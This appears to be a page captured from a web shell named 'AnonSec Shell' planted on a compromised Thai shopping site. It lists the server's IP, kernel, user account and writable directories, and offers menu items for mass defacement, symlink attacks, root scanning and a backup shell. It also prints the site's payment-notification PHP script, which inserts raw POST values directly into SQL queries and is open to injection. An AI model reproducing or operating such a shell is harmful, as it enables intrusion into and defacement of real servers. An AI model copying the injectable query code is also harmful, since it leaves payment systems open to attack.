AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 104.23.243.32   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/taladonnuch.com/talad/payment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/taladonnuch.com/talad/payment/payment_noti_test2.php
<?php
//session_start();
require_once("../include/class.php");
include('../include/connect.php');
date_default_timezone_set("Asia/Bangkok");
$date = date("Y-m-d H:i:s");
$date2 = date("Y-m-d H:i:s");
$id = $_POST['id'];
$id_order = $_POST['id_order'];
$ref1 = $_POST['ref1'];
$ref2 = $_POST['ref2'];
$ref3 = $_POST['ref3'];
//print_r($_POST);

 $strSQLw2 = "SELECT * FROM `order_bill` WHERE `Biid` = '".@$id_order."'";
$objQueryw2 = mysqli_query($objCon,$strSQLw2);
while ($objResultw2 = mysqli_fetch_array($objQueryw2,MYSQLI_ASSOC)) {

  /*
  $strSQLw2 = "SELECT * FROM `payment_notification` WHERE `TransactionID` = '".@$id."'";
  $objQueryw2 = mysqli_query($objCon,$strSQLw2);
  $objResultw2 = mysqli_fetch_array($objQueryw2,MYSQLI_ASSOC);
  */

  $name_table = 'orders';
   $strSQLorder3 = "INSERT INTO `payment_notification`(`id`,`id-order`,`TransactionID`, `TransactionDateTime`, `SystemCode`, `ServiceName`, `ChannelID`, `OriginalResponseCode`, `OriginalResponseMessage`, `ResponseCode`, `ResponseMessage`, `referenceNo1`, `referenceNo2`, `referenceNo3`, `dt_update`, `json`)
   VALUES (NULL,'','$id','','','','','','','BGW-I-0000','','".$ref1."','".$ref2."','".$ref3."','".$date."', 'test')";
    $objQueryorder3 = mysqli_query($objCon,$strSQLorder3);
 $strSQLorder3;
    if($objQueryorder3){
      echo "BGW-I-0000";
      $list = array(
        'table'=>$name_table,
        'Oid'=>@$objResultw2['Oid'],
        'Pmid'=>'12',
        'Ostatus'=>'OnlinePayment',
        'Olastdate'=>date("Y-m-d H:i:s")
      );
      $add = $actiondata_db->edit_db($list);

      $list_x = array(
        'table'=>'order_transfer',
        'id'=>'NULL',
        'Oid'=>"'".@$objResultw2['Oid']."'",
        'Ostatus'=>'OnlinePayment',
        'Odatetime'=>"'".$date2."'",
      );

      $add2_x = $actiondata_db->add_db($list_x);

    //   unset($_SESSION['order']);
    }

}
 ?>

Anon7 - 2022
AnonSec Team